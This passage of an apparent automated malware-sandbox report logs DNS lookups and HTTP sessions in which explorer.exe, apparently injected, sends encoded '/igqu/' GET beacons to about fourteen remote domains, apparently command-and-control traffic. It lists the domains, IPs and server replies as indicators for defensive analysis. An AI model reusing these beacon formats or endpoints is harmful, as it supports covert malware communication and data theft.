                                                                                Nov 21, 2020 09:24:22.287492037 CET8.8.8.8192.168.2.50xfd93No error (0)www.erpsystem.siteerpsystem.siteCNAME (Canonical name)IN (0x0001)
                                                                                Nov 21, 2020 09:24:22.287492037 CET8.8.8.8192.168.2.50xfd93No error (0)erpsystem.site34.102.136.180A (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:24:27.507025957 CET8.8.8.8192.168.2.50xfd85No error (0)www.forbigdogs.comforbigdogs.comCNAME (Canonical name)IN (0x0001)
                                                                                Nov 21, 2020 09:24:27.507025957 CET8.8.8.8192.168.2.50xfd85No error (0)forbigdogs.com81.169.145.95A (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:24:32.940440893 CET8.8.8.8192.168.2.50x88b2No error (0)www.rockinglifefromhome.comrockinglifefromhome.comCNAME (Canonical name)IN (0x0001)
                                                                                Nov 21, 2020 09:24:32.940440893 CET8.8.8.8192.168.2.50x88b2No error (0)rockinglifefromhome.com34.102.136.180A (IP address)IN (0x0001)
                                                                                Nov 21, 2020 09:24:38.254417896 CET8.8.8.8192.168.2.50x7179No error (0)www.allmm.infoallmm.infoCNAME (Canonical name)IN (0x0001)
                                                                                Nov 21, 2020 09:24:38.254417896 CET8.8.8.8192.168.2.50x7179No error (0)allmm.info34.102.136.180A (IP address)IN (0x0001)

                                                                                HTTP Request Dependency Graph

                                                                                • www.ariasu-nakanokaikei.com
                                                                                • www.allan-wren.com
                                                                                • www.theoutdoorbed.com
                                                                                • www.sweetbasilmarketing.com
                                                                                • www.pasumaisangam.com
                                                                                • www.justsoldbykristen.com
                                                                                • www.lotoencasa.com
                                                                                • www.guidesgold.net
                                                                                • www.thoughtslate.com
                                                                                • www.chemtradent.com
                                                                                • www.erpsystem.site
                                                                                • www.forbigdogs.com
                                                                                • www.rockinglifefromhome.com
                                                                                • www.allmm.info

                                                                                HTTP Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                0192.168.2.54974013.224.93.4880C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Nov 21, 2020 09:23:22.907758951 CET264OUTGET /igqu/?1b3H_Ni=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xt/OgRWZ9lL&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1
                                                                                Host: www.ariasu-nakanokaikei.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Nov 21, 2020 09:23:22.924204111 CET265INHTTP/1.1 301 Moved Permanently
                                                                                Server: CloudFront
                                                                                Date: Sat, 21 Nov 2020 08:23:22 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 183
                                                                                Connection: close
                                                                                Location: https://www.ariasu-nakanokaikei.com/igqu/?1b3H_Ni=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xt/OgRWZ9lL&JXhpvv=OXXTgtL8CzU0PRx0
                                                                                X-Cache: Redirect from cloudfront
                                                                                Via: 1.1 c202f63846a430afd2d556266be8b50c.cloudfront.net (CloudFront)
                                                                                X-Amz-Cf-Pop: ZRH50-C1
                                                                                X-Amz-Cf-Id: IvrzCmMd-h2iLZwaz6t1hSr_hNGNKqs9Q0D7lXDME7vECDC-faQVBw==
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                1192.168.2.549746104.161.26.8780C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Nov 21, 2020 09:23:28.311546087 CET5133OUTGET /igqu/?1b3H_Ni=Jn5Vr1+14bH3XXZofqraFeWVa26wP8rJvzlWs5bnBoBEHljdRY0tb4g4rLkzBbL1dWSS&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1
                                                                                Host: www.allan-wren.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Nov 21, 2020 09:23:28.490438938 CET5134INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Sat, 21 Nov 2020 08:23:26 GMT
                                                                                Content-Type: text/html; charset=GBK
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Data Raw: 32 33 63 0d 0a 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 23c<html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                10192.168.2.54975634.102.136.18080C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Nov 21, 2020 09:24:22.307404995 CET5156OUTGET /igqu/?1b3H_Ni=ZRPeOuYuFqwCE6hLODJInGZZul3mSlUAF2kmaH+TgtUwwh/GNGVQ9RWrqwSZOKD9NgnN&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1
                                                                                Host: www.erpsystem.site
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Nov 21, 2020 09:24:22.422575951 CET5157INHTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Sat, 21 Nov 2020 08:24:22 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "5fb7c4ff-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                11192.168.2.54975781.169.145.9580C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Nov 21, 2020 09:24:27.529479027 CET5158OUTGET /igqu/?1b3H_Ni=hqyhMfRLrOIQC7GjaQnjrCruer7JrdNhQeLxI9U0LsQdDm7qZoXdq0VVbkb5+tb+Xu86&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1
                                                                                Host: www.forbigdogs.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Nov 21, 2020 09:24:27.551035881 CET5158INHTTP/1.1 404 Not Found
                                                                                Date: Sat, 21 Nov 2020 08:24:27 GMT
                                                                                Server: Apache/2.4.43 (Unix)
                                                                                Content-Length: 196
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                12192.168.2.54975834.102.136.18080C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Nov 21, 2020 09:24:32.959045887 CET5159OUTGET /igqu/?1b3H_Ni=42cTP78OQQp4lToQAaTApkvzdS7tu3b97V7Z9hUZNPZ7GHRvcEVBBFWfORKXu9ozCmYh&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1
                                                                                Host: www.rockinglifefromhome.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Nov 21, 2020 09:24:33.074023008 CET5160INHTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Sat, 21 Nov 2020 08:24:33 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "5fb7c4ff-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                13192.168.2.54975934.102.136.18080C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Nov 21, 2020 09:24:38.272831917 CET5161OUTGET /igqu/?1b3H_Ni=4PnhXD1XQOAEhvyRg6knEMy8erSWBtwfFfVfV7Yg7HuI1lqkNO9tokZPvE8hw33lw/Tr&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1
                                                                                Host: www.allmm.info
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Nov 21, 2020 09:24:38.388168097 CET5161INHTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Sat, 21 Nov 2020 08:24:38 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "5fb7c4ff-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                14192.168.2.54976013.224.93.4880C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Nov 21, 2020 09:24:48.429152966 CET5162OUTGET /igqu/?1b3H_Ni=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xt/OgRWZ9lL&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1
                                                                                Host: www.ariasu-nakanokaikei.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Nov 21, 2020 09:24:48.445446014 CET5163INHTTP/1.1 301 Moved Permanently
                                                                                Server: CloudFront
                                                                                Date: Sat, 21 Nov 2020 08:24:48 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 183
                                                                                Connection: close
                                                                                Location: https://www.ariasu-nakanokaikei.com/igqu/?1b3H_Ni=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xt/OgRWZ9lL&JXhpvv=OXXTgtL8CzU0PRx0
                                                                                X-Cache: Redirect from cloudfront
                                                                                Via: 1.1 ebbd7f31e48ea8cf77f6021cdd92bf62.cloudfront.net (CloudFront)
                                                                                X-Amz-Cf-Pop: ZRH50-C1
                                                                                X-Amz-Cf-Id: kQDUShKpwKbutxLz03ey90bfXEs9uxcIn9QVJFiQp9TTjTf4tXOV3Q==
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                2192.168.2.54974734.102.136.18080C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Nov 21, 2020 09:23:33.580173016 CET5135OUTGET /igqu/?1b3H_Ni=7TsZUea1gk4hSEvdc6EZbm1J0Wfs+lYlHRlJN5vF1TH1x8D6KkvV8DgWQzT8NLbVi8yc&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1
                                                                                Host: www.theoutdoorbed.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Nov 21, 2020 09:23:33.695125103 CET5136INHTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Sat, 21 Nov 2020 08:23:33 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "5fb7c735-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                3192.168.2.549748185.201.11.12680C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Nov 21, 2020 09:23:38.914375067 CET5137OUTGET /igqu/?1b3H_Ni=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJg4WZr1G+1s&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1
                                                                                Host: www.sweetbasilmarketing.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Nov 21, 2020 09:23:39.243913889 CET5137INHTTP/1.1 301 Moved Permanently
                                                                                Connection: close
                                                                                X-Powered-By: PHP/7.2.34
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                X-Redirect-By: WordPress
                                                                                Location: http://sweetbasilmarketing.com/igqu/?1b3H_Ni=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJg4WZr1G+1s&JXhpvv=OXXTgtL8CzU0PRx0
                                                                                X-Litespeed-Cache: miss
                                                                                Content-Length: 0
                                                                                Date: Sat, 21 Nov 2020 08:23:39 GMT
                                                                                Server: LiteSpeed


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                4192.168.2.5497493.127.175.5080C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Nov 21, 2020 09:23:44.354377985 CET5138OUTGET /igqu/?1b3H_Ni=cgoB+lenqGYlJtvc5JNC9VTF2CGbWvKagdSG/Om1O4x9+LG6GIhzUmnXZfPmgHDFLZxT&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1
                                                                                Host: www.pasumaisangam.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Nov 21, 2020 09:23:44.371169090 CET5139INHTTP/1.1 301 Moved Permanently
                                                                                Server: nginx/1.16.1
                                                                                Date: Sat, 21 Nov 2020 08:23:44 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Location: https://www.pasumaisangam.com:443/igqu/?1b3H_Ni=cgoB+lenqGYlJtvc5JNC9VTF2CGbWvKagdSG/Om1O4x9+LG6GIhzUmnXZfPmgHDFLZxT&JXhpvv=OXXTgtL8CzU0PRx0
                                                                                Data Raw: 61 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.16.1</center></body></html>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                5192.168.2.54975052.71.133.13080C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Nov 21, 2020 09:23:49.532294989 CET5139OUTGET /igqu/?1b3H_Ni=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEBypKVKLfK2k&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1
                                                                                Host: www.justsoldbykristen.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Nov 21, 2020 09:23:49.635669947 CET5140INHTTP/1.1 301 Moved Permanently
                                                                                Server: openresty/1.17.8.2
                                                                                Date: Sat, 21 Nov 2020 08:23:49 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 175
                                                                                Connection: close
                                                                                Location: https://www.justsoldbykristen.com/igqu/?1b3H_Ni=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEBypKVKLfK2k&JXhpvv=OXXTgtL8CzU0PRx0
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 37 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty/1.17.8.2</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                6192.168.2.549752192.155.168.1480C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Nov 21, 2020 09:23:55.216972113 CET5149OUTGET /igqu/?1b3H_Ni=xBkCUm8FF1kjoaFXSBT5hrl7iUeljBCg0asG3x/fx29GNVo3vuMsob2h52kMpeSzyrJ8&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1
                                                                                Host: www.lotoencasa.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Nov 21, 2020 09:23:55.423753023 CET5150INHTTP/1.1 200 OK
                                                                                Server: nginx
